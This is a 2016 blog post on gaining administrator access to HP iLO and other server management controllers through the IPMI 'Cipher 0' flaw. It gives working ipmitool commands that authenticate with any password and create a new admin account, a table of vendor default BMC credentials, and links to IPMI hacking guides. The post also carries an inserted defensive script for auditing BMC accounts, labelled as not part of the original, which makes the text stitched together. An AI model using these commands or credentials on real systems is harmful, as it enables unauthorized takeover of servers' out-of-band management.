Thursday, December 22, 2016

Create an HP iLo account when you don't know the Admin Password

Older versions of out-of-band management processors such as HP iLo, Dell DRAC, IBM IMM and Supermicro IPMI supported a feature called Cipher 0, which is clear-text authentication. Due to a flaw in the implementation, ANY password works against the built-in Administrator account.

Ubuntu has a package called ipmitool in its repository. Using ipmitool you can list the users and add a new Administrative user. For HP iLo this works on firmware up to v1.6 on iLo3 and up to v1.3 on iLo4.

To install ipmitool:
sudo apt-get install ipmitool

Once the install is complete you can use the list command to see the current users:

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list

Once you run the list command, look for an ID that shows (Empty User).

On the server I used this command on, ID 2 was empty, so I ran:

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 Monitor

to create a new user.

and finally

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 SecretPassword


to create a password.


Once that was done I opened a browser and logged into iLo as an administrator using my newly created account.

Obviously this is a security issue!  You must upgrade your firmware to fix this issue.
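The account created above shows up as a new named entry in a slot that used to be empty, so comparing the user list against the accounts you expect is one way to spot it. The script below is an added example, not part of the original post: the audit_users and sample_user_list names, the allowlist, the placeholder host and the constructed sample listing (whose column layout is an assumption) are all illustrative.

```shell
#!/bin/sh
# Added example: flag BMC accounts that are not on an expected-accounts list.
#
# audit_users ALLOWED
#   Reads "ipmitool user list" output on stdin and prints "id:name:privilege"
#   for every named account missing from the comma-separated list ALLOWED.
audit_users() {
    awk -v allowed="$1" '
    BEGIN { n = split(allowed, a, ","); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 ~ /^[0-9]+$/ {
        # The three true/false flag columns separate the name from the privilege.
        if (!match($0, /(true|false)[ \t]+(true|false)[ \t]+(true|false)/)) next
        name = substr($0, 1, RSTART - 1)
        priv = substr($0, RSTART + RLENGTH)
        sub(/^[0-9]+[ \t]*/, "", name); sub(/[ \t]+$/, "", name)
        sub(/^[ \t]+/, "", priv);       sub(/[ \t]+$/, "", priv)
        if (name == "" || name ~ /^\( *Empty User\)$/) next   # unused slot
        if (!(name in ok)) print $1 ":" name ":" priv
    }'
}

# Constructed sample listing (not captured from a real BMC; layout assumed).
sample_user_list() {
    cat <<'EOF'
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   Monitor          true    false      true       ADMINISTRATOR
3   (Empty User)     true    false      false      NO ACCESS
EOF
}

# Against a live BMC (placeholder host; -E reads the password from IPMI_PASSWORD):
#   ipmitool -I lanplus -H <bmc-address> -U Administrator -E user list \
#       | audit_users "Administrator"

# Demo on the constructed listing: only Administrator is expected.
sample_user_list | audit_users "Administrator"
```

Any line it prints is an account to investigate; run it on a schedule and alert on non-empty output.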

All manufacturers except HP use a default password, so you don't even have to create a user if IT didn't change the default.


Product Name | Default Username | Default Password
--- | --- | ---
HP Integrated Lights Out (iLO) | Administrator | <factory randomized 8-character string>
Dell Remote Access Card (iDRAC, DRAC) | root | calvin
IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controller | admin | admin
Supermicro IPMI (2.0) | ADMIN | ADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme
ASUS iKVM BMC | admin | admin


The reference websites listed below have much more information on IPMI hacking. The link HPiLO Cmdlets is an article on using PowerShell under Windows to manage iLo.




References

Hacking IPMI Cipher 0 Using Kali Linux - A nice tutorial on using ipmitool and bmc-config
A Penetration Tester's Guide to IPMI and BMCs - A great tutorial on the Cipher 0 issue and IPMI
How to find all the iLO’s on your network - A nice bash script for locating iLo devices on a subnet
HPiLO Cmdlets Version 1.2.0.0 - HP's download for iLo PowerShell Cmdlets
HewlettPackard PowerShell Sample Scripts - Some official HP sample scripts
GNU FreeIPMI - A Linux package for working with BMCs
IPMITOOL useful examples
IPMI++ Security Best Practices
